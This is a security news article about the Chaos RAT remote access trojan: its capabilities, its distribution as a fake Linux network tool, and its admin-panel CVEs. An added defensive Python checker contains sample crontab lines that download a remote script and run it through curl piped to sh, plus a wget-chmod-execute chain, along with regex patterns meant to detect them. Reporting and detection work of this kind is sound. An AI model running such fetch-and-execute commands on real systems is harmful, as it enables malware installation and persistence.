Chaos RAT malware targets Windows and Linux via fake network tool downloads

Chaos RAT spreads via fake network tools

Threat hunters are turning their attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems.

According to findings from Acronis, the malware may have been distributed by tricking victims into downloading a network troubleshooting tool for Linux environments.

“Chaos RAT is an open-source RAT program written in Golang, offering cross-platform support for both Windows and Linux systems,” say security researchers Santiago Pontiroli, Gabor Molnar, and Kirill Antonenko in a report shared with The Hacker News.


“Inspired by popular frameworks like Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions, and control compromised machines.”

Although work on the “remote administration tool” began back in 2017, it didn’t attract attention until December 2022, when it was used in a malicious campaign targeting public web applications running on Linux systems with the XMRig cryptocurrency miner.

Once installed, the malware connects to an external server and waits for commands that allow it to launch reverse shells, upload/download/delete files, list files and directories, take screenshots, collect system information, lock/reboot/shutdown the machine, and open arbitrary URLs. The latest version of Chaos RAT is 5.0.3, which was released on May 31, 2024.

Acronis said that Linux variants of the malware have since been discovered in the wild, often in conjunction with cryptocurrency mining campaigns. Attack chains observed by the company show that the Chaos RAT is being distributed to victims via phishing emails containing malicious links or attachments.

These artifacts are designed to drop a malicious script that can modify the task scheduler “/etc/crontab” to periodically download malware as a way to set up persistence.
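As an added example (not from the article, Acronis, or the Chaos RAT project), the following Python checker parses system-crontab lines and flags jobs that fetch remote content and execute it, the cron-based re-download persistence described above. The sample crontab, the documentation address 203.0.113.5, and the matching heuristics are constructed assumptions, not indicators from the campaign.

```python
import re

# Constructed sample of /etc/crontab content (system crontab format: minute hour dom
# month dow user command). These lines are made up for this example; the curl/wget
# entries mimic a script that periodically re-downloads malware for persistence.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/10 * * * *    root    curl -fsSL http://203.0.113.5/na.sh | sh
0 * * * *       root    wget -q -O /tmp/.x http://203.0.113.5/bin && chmod +x /tmp/.x && /tmp/.x
30 2 * * *      backup  /usr/local/bin/backup.sh
"""

# Hypothetical heuristics (assumption, not from the article): a cron command that pulls
# a URL and pipes it into a shell, or fetches a file and then runs it, is suspicious.
DOWNLOADER = re.compile(r"\b(curl|wget)\b[^|;&]*https?://")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
EXEC_AFTER_FETCH = re.compile(r"(chmod\s+\+x|&&\s*(/tmp|/var/tmp|/dev/shm)/\S+)")


def parse_system_crontab(text):
    """Yield (user, command) for each job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # malformed line; not a complete system-crontab job
        yield fields[5], fields[6]


def find_suspicious_jobs(text):
    """Return [(user, command, reason)] for jobs matching the download-and-execute pattern."""
    hits = []
    for user, cmd in parse_system_crontab(text):
        if not DOWNLOADER.search(cmd):
            continue
        if PIPE_TO_SHELL.search(cmd):
            hits.append((user, cmd, "remote script piped to shell"))
        elif EXEC_AFTER_FETCH.search(cmd):
            hits.append((user, cmd, "fetched file made executable or run from temp dir"))
    return hits


if __name__ == "__main__":
    for user, cmd, reason in find_suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[{user}] {reason}: {cmd}")
```

Point it at a real `/etc/crontab` (and the files under `/etc/cron.d`) to triage hosts; a match is a lead to investigate, not proof of compromise.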

Fake network tool downloads

“Early campaigns used this technique to deliver cryptocurrency miners and the Chaos RAT separately, indicating that Chaos was primarily used for reconnaissance and information gathering on compromised devices,” the researchers said.

An analysis of a recent sample uploaded to VirusTotal in January 2025 from India under the name “NetworkAnalyzer.tar.gz” has raised the possibility that users are being tricked into downloading the malware because it poses as a network troubleshooting tool for Linux environments.

Additionally, the admin panel that allows users to build payloads and manage infected machines has been found to be vulnerable to a command injection flaw (CVE-2024-30850, CVSS score: 8.8) which can be combined with a cross-site scripting flaw (CVE-2024-31839, CVSS score: 4.8) to execute arbitrary code on the server with elevated privileges. Both vulnerabilities have since been patched by the Chaos RAT developers as of May 2024.

Although it is currently not clear who is behind the use of Chaos RAT in real-world attacks, the development once again illustrates how threat actors continue to weaponize open source tools to their advantage and confuse attribution efforts.

“What starts as a developer tool can quickly become a threat actor’s first choice,” the researchers said. “Using publicly available malware helps APT groups blend into the noise of everyday cybercrime. Open source malware offers a ‘good enough’ toolkit that can be quickly adapted and deployed. When multiple actors use the same open source malware, it becomes unclear what is meant.”

The revelation coincides with the emergence of a new campaign targeting Trust Wallet users on desktop computers with counterfeit versions distributed via deceptive download links, phishing emails, or bundled software. The goal is to collect browser data, extract data from desktop wallets and browser extensions, execute commands, and act as malware.

“Once installed, the malware can scan for wallet files, capture data from the clipboard, or monitor browser sessions to capture passphrases or private keys,” says Point Wild researcher Kedar S Pandit in a report published this week.
